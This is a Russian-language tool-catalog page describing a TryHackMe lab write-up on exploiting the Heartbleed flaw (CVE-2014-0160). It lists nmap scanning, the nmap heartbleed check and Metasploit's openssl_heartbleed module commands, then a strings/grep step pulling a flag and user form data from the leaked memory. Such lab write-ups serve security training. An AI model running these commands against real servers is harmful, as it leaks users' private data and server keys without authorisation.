Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
Криминалистика памятиАнализ уязвимостейЭксплуатацияСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

Целью этого проекта была оценка удаленного хоста на уязвимость Heartbleed (CVE-2014-0160), проверка ее наличия и эксплуатация для извлечения потенциально конфиденциальной информации из памяти сервера по протоколу TLS.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
61 год назадЕщё не проверено

Цель Целью этого проекта была оценка удаленного хоста на уязвимость Heartbleed (CVE-2014-0160), проверка её наличия и эксплуатация для извлечения потенциально чувствительной информации из памяти сервера через протокол TLS.

Выполнение

  1. Определение открытых сервисов (Nmap) nmap -sC -sV 52.215.184.158 Результат:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS-сертификат был самоподписанным и просроченным. Это вызвало подозрение, что версия OpenSSL может быть устаревшей. Целевой порт: 443.

  1. Проверка уязвимости Heartbleed (скрипт Nmap) nmap -p 443 --script ssl-heartbleed 52.215.184.158 Результат:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Цель подтверждена как уязвимая для Heartbleed.

  1. Эксплуатация (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run Результат:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin Память успешно сброшена и сохранена локально для анализа.

  1. Анализ дампа памяти

strings openssl.heartble_152689.bin | grep -i "THM{" Результат:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} Конфиденциальные данные, включая флаг приложения, были успешно извлечены из TLS-памяти — что подтверждает практическую возможность эксплуатации уязвимости для утечки чувствительной информации.

Заключение Я успешно выявил и эксплуатировал CVE-2014-0160 на удаленном сервере. Процесс включал:

  • Обнаружение уязвимости с помощью nmap
  • Эксплуатацию недостатка с использованием Metasploit
  • Извлечение из памяти данных, отправленных живым пользователем (включая флаг THM{sSl-Is-BaD})

Влияние на бизнес Наличие Heartbleed в публично доступной системе представляет критический риск:

  • Возможная утечка закрытых ключей TLS
  • Перехват сессий
  • Раскрытие имен пользователей, адресов электронной почты и чувствительного пользовательского ввода
Скачать инструмент